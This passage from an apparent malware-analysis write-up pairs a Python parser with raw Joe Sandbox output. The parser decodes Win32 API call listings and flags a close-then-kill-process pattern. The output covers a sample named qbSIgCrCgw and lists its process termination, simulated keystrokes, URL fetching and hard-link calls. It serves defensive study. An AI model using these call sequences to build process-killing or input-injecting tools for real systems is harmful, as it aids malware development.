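# parameter (see the OpenProcess/TerminateProcess lines above), so trim them.
PARAM_COUNT = {"PostMessageW": 4, "SendMessageTimeoutW": 7, "GetWindowThreadProcessId": 2,
               "OpenProcess": 3, "TerminateProcess": 2, "CloseHandle": 1, "MapVirtualKeyW": 2}
# Win32 SDK constants relevant to the listings above.
WM = {0x0010: "WM_CLOSE", 0x0102: "WM_CHAR"}
SMTO = {0x0000: "SMTO_NORMAL", 0x0001: "SMTO_BLOCK", 0x0002: "SMTO_ABORTIFHUNG"}
ACCESS = {0x001F0FFF: "PROCESS_ALL_ACCESS"}
VK = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU",
      0x5B: "VK_LWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}
# (api name, zero-based parameter index) -> table used to name that parameter
DECODERS = {("PostMessageW", 1): WM, ("SendMessageTimeoutW", 1): WM,
            ("SendMessageTimeoutW", 4): SMTO, ("OpenProcess", 0): ACCESS,
            ("MapVirtualKeyW", 0): VK}


def parse_arg(tok: str) -> Arg:
    tok = tok.strip()
    if tok == "?":
        return None
    try:
        return int(tok, 16)      # numeric args are printed as 8-digit hex
    except ValueError:
        return tok               # e.g. the DllGetClassObject string literal


def parse_listing(text: str) -> List[Call]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue             # "APIs", "Strings", hash lines and so on
        raw = m.group("args")
        args = [parse_arg(t) for t in raw.split(",")] if raw else []
        limit = PARAM_COUNT.get(m.group("api"))
        if limit is not None:
            args = args[:limit]
        sub = m.group("sub")
        calls.append(Call(m.group("api"), m.group("mod"), args,
                          int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


def describe(c: Call) -> str:
    """Render a call with symbolic names wherever a constant table is known."""
    parts = []
    for i, a in enumerate(c.args):
        table = DECODERS.get((c.api, i))
        if a is None:
            parts.append("?")
        elif isinstance(a, int):
            parts.append(table[a] if table and a in table else (f"0x{a:X}" if a > 9 else str(a)))
        else:
            parts.append(repr(a))
    return f"{c.api}({', '.join(parts)})"


def kill_pattern(calls: List[Call]) -> List[str]:
    """Flag WM_CLOSE to a window followed by OpenProcess(PROCESS_ALL_ACCESS) + TerminateProcess."""
    findings, saw_close, saw_open = [], False, False
    for c in calls:
        if c.api in ("PostMessageW", "SendMessageTimeoutW") and len(c.args) > 1 and c.args[1] == 0x10:
            saw_close = True
        elif c.api == "OpenProcess" and c.args and c.args[0] == 0x001F0FFF:
            saw_open = True
        elif c.api == "TerminateProcess" and saw_open:
            findings.append(f"{c.ref:08X}: OpenProcess(PROCESS_ALL_ACCESS) then TerminateProcess kills a foreign process")
            if saw_close:
                findings.append("WM_CLOSE was sent first: graceful close attempted before the kill")
    return findings


# Constructed input: the two "APIs" blocks copied from the listing above.
WINKILL_SAMPLE = """\
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 003F7C07
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 003F7C1D
• GetWindowThreadProcessId.USER32(?,?), ref: 003F7C2C
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003F7C3B
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003F7C45
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003F7C4C
"""
VK_SAMPLE = """\
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 003B281D
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 003B283B
"""

if __name__ == "__main__":
    for c in parse_listing(WINKILL_SAMPLE) + parse_listing(VK_SAMPLE):
        print(f"{c.ref:08X}  {describe(c)}")
    for f in kill_pattern(parse_listing(WINKILL_SAMPLE)):
        print("finding:", f)
```

Run against the 003F7C07 block the decoder renders the first call as PostMessageW(?, WM_CLOSE, 0, 0) and the fourth as OpenProcess(PROCESS_ALL_ACCESS, 0, ?); the 500 ms timeout (0x1F4) with SMTO_ABORTIFHUNG on the SendMessageTimeoutW line is the wait given to the target window before the handle is opened and the process terminated. Only the first PARAM_COUNT arguments of each line are meaningful; the rest is stack noise the report reproduces verbatim, which is why the trimming step matters before comparing call sequences across functions.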
                                                                                APIs
                                                                                • InterlockedExchange.KERNEL32(?,?), ref: 003F9A33
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,00425DEE,?,?,?,?,?,003BED63), ref: 003F9A44
                                                                                • TerminateThread.KERNEL32(?,000001F6,?,?,?,00425DEE,?,?,?,?,?,003BED63), ref: 003F9A51
                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00425DEE,?,?,?,?,?,003BED63), ref: 003F9A5E
                                                                                  • Part of subcall function 003F93D1: CloseHandle.KERNEL32(?,?,003F9A6B,?,?,?,00425DEE,?,?,?,?,?,003BED63), ref: 003F93DB
                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 003F9A71
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,00425DEE,?,?,?,?,?,003BED63), ref: 003F9A78
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                • String ID:
                                                                                • API String ID: 3495660284-0
                                                                                • Opcode ID: 76eacc0ddecffb042341ef1a76401755ee86adf8443e028fea403e98bf894b81
                                                                                • Instruction ID: 9ab710e51889656f32f627deb1185f1bfae0971419bb52fd0b6f66551bdac80c
                                                                                • Opcode Fuzzy Hash: 76eacc0ddecffb042341ef1a76401755ee86adf8443e028fea403e98bf894b81
                                                                                • Instruction Fuzzy Hash: FAF05E32941211ABD7121BA4FC89EEB773AFF84301F151476F603950A0DBB59811DB55
                                                                                APIs
                                                                                  • Part of subcall function 003CF4EA: std::exception::exception.LIBCMT ref: 003CF51E
                                                                                  • Part of subcall function 003CF4EA: __CxxThrowException@8.LIBCMT ref: 003CF533
                                                                                • __swprintf.LIBCMT ref: 003B1EA6
                                                                                Strings
                                                                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 003B1D49
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                • API String ID: 2125237772-557222456
                                                                                • Opcode ID: 9b846c60daa38b53cc4d8cf59c272a683d584b0aedfab420d61d0b9bdbf12a6d
                                                                                • Instruction ID: 8cf2667bc6177e5a3dbbdf1e819fb4774c7a4903b1091067e51e9c1fdcc47004
                                                                                • Opcode Fuzzy Hash: 9b846c60daa38b53cc4d8cf59c272a683d584b0aedfab420d61d0b9bdbf12a6d
                                                                                • Instruction Fuzzy Hash: A691A171204211AFC726EF24D896CAFB7B4BF85704F40491EFA459B6A1DB74EE04CB92
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(?), ref: 0040B006
                                                                                • CharUpperBuffW.USER32(?,?), ref: 0040B115
                                                                                • VariantClear.OLEAUT32(?), ref: 0040B298
                                                                                  • Part of subcall function 003F9DC5: VariantInit.OLEAUT32(00000000), ref: 003F9E05
                                                                                  • Part of subcall function 003F9DC5: VariantCopy.OLEAUT32(?,?), ref: 003F9E0E
                                                                                  • Part of subcall function 003F9DC5: VariantClear.OLEAUT32(?), ref: 003F9E1A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                • API String ID: 4237274167-1221869570
                                                                                • Opcode ID: 8b6c3462775b857ef9f377d1a8f57e7dc75cc71439eb5a4f215f719117502583
                                                                                • Instruction ID: becdd157f0f420d3d3dadfc24070a8015f62100597099e5928c5af20203fde52
                                                                                • Opcode Fuzzy Hash: 8b6c3462775b857ef9f377d1a8f57e7dc75cc71439eb5a4f215f719117502583
                                                                                • Instruction Fuzzy Hash: 82918C706083019FCB10DF24C48599BB7F4EF89704F04486EF99A9B392DB35E905CB96
                                                                                APIs
                                                                                  • Part of subcall function 003CC6F4: _wcscpy.LIBCMT ref: 003CC717
                                                                                • _memset.LIBCMT ref: 003F5438
                                                                                • GetMenuItemInfoW.USER32(?), ref: 003F5467
                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003F5513
                                                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 003F553D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                • String ID: 0
                                                                                • API String ID: 4152858687-4108050209
                                                                                • Opcode ID: f2f9edd63c3971d559117e0d611ca9c2185762f22b4210b559717b8d75df9516
                                                                                • Instruction ID: e5113c794a0413b2fad108da6d0e0086837ba0b8615d77543e118bb978961c48
                                                                                • Opcode Fuzzy Hash: f2f9edd63c3971d559117e0d611ca9c2185762f22b4210b559717b8d75df9516
                                                                                • Instruction Fuzzy Hash: 675123716047099BD7169F2CC841BBBBBE8AF86314F05062EFB9AD71A1DB60CD44CB52
                                                                                APIs
                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 003F027B
                                                                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 003F02B1
                                                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 003F02C2
                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 003F0344
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                • String ID: DllGetClassObject
                                                                                • API String ID: 753597075-1075368562
                                                                                • Opcode ID: 419c3a6481322aaf3db1b1393339174f7e973018d047c396826e2b1e94915aff
                                                                                • Instruction ID: edab09a5d986faea44148b6a6b3e0ec8156b985b7f92d35013c55fe0bb5727ae
                                                                                • Opcode Fuzzy Hash: 419c3a6481322aaf3db1b1393339174f7e973018d047c396826e2b1e94915aff
                                                                                • Instruction Fuzzy Hash: F8416875600208DFDB0ACF58C984BAA7BB9EF44310F15806AEE09DF206D7B5DD44CBA0
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 003F5075
                                                                                • GetMenuItemInfoW.USER32 ref: 003F5091
                                                                                • DeleteMenu.USER32(00000004,00000007,00000000), ref: 003F50D7
                                                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00471708,00000000), ref: 003F5120
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Delete$InfoItem_memset
                                                                                • String ID: 0
                                                                                • API String ID: 1173514356-4108050209
                                                                                • Opcode ID: 18e2c5e1e3978fee682174c77a33c89f99df9f2847e7de9628a411c802938ef4
                                                                                • Instruction ID: 35d925947ed21d9df82212e28f8ca699ad6fbc7a929d3640979b2d9e0991bf31
                                                                                • Opcode Fuzzy Hash: 18e2c5e1e3978fee682174c77a33c89f99df9f2847e7de9628a411c802938ef4
                                                                                • Instruction Fuzzy Hash: DA41C131204705AFDB22DF28DC85F6AB7E8AF85314F04461EFB659B291D730E804CB62
                                                                                APIs
                                                                                • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 003F3966
                                                                                • SetKeyboardState.USER32(00000080,?,00000001), ref: 003F3982
                                                                                • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 003F39EF
                                                                                • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 003F3A4D
                                                                                Strings
                                                                                • 672ff0652ff0612ff0652ff0682ff06b2ff0652ff0652ff06f2ff06c2ff0682ff06b2ff0642ff0652ff06e2ff0642ff0602ff06f2ff06b2ff0672ff0602ff06c2f, xrefs: 003F399D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                • String ID: 672ff0652ff0612ff0652ff0682ff06b2ff0652ff0652ff06f2ff06c2ff0682ff06b2ff0642ff0652ff06e2ff0642ff0602ff06f2ff06b2ff0672ff0602ff06c2f
                                                                                • API String ID: 432972143-2477213679
                                                                                • Opcode ID: 71782a11de0fe3449a71353b94567b2744041bca84670ad15ec7847c5fc0caed
                                                                                • Instruction ID: 3c521532a9fa2872300443ae4435d0a49deee54704eeda94d0d622677ea01aad
                                                                                • Opcode Fuzzy Hash: 71782a11de0fe3449a71353b94567b2744041bca84670ad15ec7847c5fc0caed
                                                                                • Instruction Fuzzy Hash: C3411670E0424CAEEF228B65C80ABFFBBB9AB55310F14015AF6C1962D1C7F48E85D765
                                                                                APIs
                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 003FE742
                                                                                • GetLastError.KERNEL32(?,00000000), ref: 003FE768
                                                                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 003FE78D
                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 003FE7B9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                • String ID: p1Wu`KXu
                                                                                • API String ID: 3321077145-4063981602
                                                                                • Opcode ID: 5bebdf836cd221de7ebd36c2b295120f6facffe3c6a85dc63d935b63910d3f53
                                                                                • Instruction ID: 9368ed225393586aa7bc4e015d184612678b5ef7dceaea0eb67e04f4ee8031e1
                                                                                • Opcode Fuzzy Hash: 5bebdf836cd221de7ebd36c2b295120f6facffe3c6a85dc63d935b63910d3f53
                                                                                • Instruction Fuzzy Hash: 9D413739600614DFCB12EF15C544A5DBBE5BF59714B098499EA0AAF7B2CB30FC00CB91
                                                                                APIs
                                                                                • GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 003F3AB8
                                                                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 003F3AD4
                                                                                • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 003F3B34
                                                                                • SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 003F3B92
                                                                                Strings
                                                                                • 672ff0652ff0612ff0652ff0682ff06b2ff0652ff0652ff06f2ff06c2ff0682ff06b2ff0642ff0652ff06e2ff0642ff0602ff06f2ff06b2ff0672ff0602ff06c2f, xrefs: 003F3AF2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                • String ID: 672ff0652ff0612ff0652ff0682ff06b2ff0652ff0652ff06f2ff06c2ff0682ff06b2ff0642ff0652ff06e2ff0642ff0602ff06f2ff06b2ff0672ff0602ff06c2f
                                                                                • API String ID: 432972143-2477213679
                                                                                • Opcode ID: c359f8aa12cc721b3ca5a61a6d88e3517d39c0b7d75899f7c13ab0dc4f8dcd16
                                                                                • Instruction ID: fa2774dcaf2ed70db095942eb9a6c47b4c0f39eb426a551c459af33d8ff3c17f
                                                                                • Opcode Fuzzy Hash: c359f8aa12cc721b3ca5a61a6d88e3517d39c0b7d75899f7c13ab0dc4f8dcd16
                                                                                • Instruction Fuzzy Hash: CC315630A0425CAEEF338B64C829BFEBBA99F55310F05016AF681972D1C7748F45C766
                                                                                APIs
                                                                                • CharLowerBuffW.USER32(?,?,?,?), ref: 00410587
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharLower
                                                                                • String ID: cdecl$none$stdcall$winapi
                                                                                • API String ID: 2358735015-567219261
                                                                                • Opcode ID: 166a2cf3bb43e51e7b55e265e7bd1106ebc64ff10906bae649bf040b62eee1f2
                                                                                • Instruction ID: 6a90f819ecf7924e5fd17ded98394477eeee644dc4d46d81a98e11770314ae70
                                                                                • Opcode Fuzzy Hash: 166a2cf3bb43e51e7b55e265e7bd1106ebc64ff10906bae649bf040b62eee1f2
                                                                                • Instruction Fuzzy Hash: 4831C530500216AFCF11EF54CD419EEB3B4FF55314B10862AE426AB6D1DBB9E955CB44
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 003EB88E
                                                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 003EB8A1
                                                                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 003EB8D1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 3850602802-1403004172
                                                                                • Opcode ID: 6aabf96cd6ed0cac5b034cdba75be7ffa2f479ae8a5c179b10a382deb1400919
                                                                                • Instruction ID: ef4aeaa1ea5dc037b76c2a6a89fe284db0535f6c9e56131ee89791122ad818ce
                                                                                • Opcode Fuzzy Hash: 6aabf96cd6ed0cac5b034cdba75be7ffa2f479ae8a5c179b10a382deb1400919
                                                                                • Instruction Fuzzy Hash: 7C21F671A00148BFDB16ABA5D887EFFB77CDF46354B104229F121AB2E1DB784E069760
                                                                                APIs
                                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00404401
                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404427
                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00404457
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040449E
                                                                                  • Part of subcall function 00405052: GetLastError.KERNEL32(?,?,004043CC,00000000,00000000,00000001), ref: 00405067
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                • String ID:
                                                                                • API String ID: 1951874230-3916222277
                                                                                • Opcode ID: 2ad1bd393c6e87e7dabd0786251d5f26bdc2f6a48686f57c179aa7ce8f9e53dd
                                                                                • Instruction ID: e75a6d87f01d44c8f3bfa95f325176641af57182fa0b8e15740f35a53925bd16
                                                                                • Opcode Fuzzy Hash: 2ad1bd393c6e87e7dabd0786251d5f26bdc2f6a48686f57c179aa7ce8f9e53dd
                                                                                • Instruction Fuzzy Hash: CB2171B1500208BEE7119B54DC85EBF76ECEB88758F10843BF605A6280DA788D055779
                                                                                APIs
                                                                                  • Part of subcall function 003CD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 003CD1BA
                                                                                  • Part of subcall function 003CD17C: GetStockObject.GDI32(00000011), ref: 003CD1CE
                                                                                  • Part of subcall function 003CD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 003CD1D8
                                                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0041915C
                                                                                • LoadLibraryW.KERNEL32(?), ref: 00419163
                                                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00419178
                                                                                • DestroyWindow.USER32(?), ref: 00419180
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                • String ID: SysAnimate32
                                                                                • API String ID: 4146253029-1011021900
                                                                                • Opcode ID: 3826d04767ef519a8db451ea665d7800d046cf92f27161bde73bf96c469be43a
                                                                                • Instruction ID: 2fd1f80eeeacd1faa7b6fd2de518339012ae404f1a171237549d425dd3c13e87
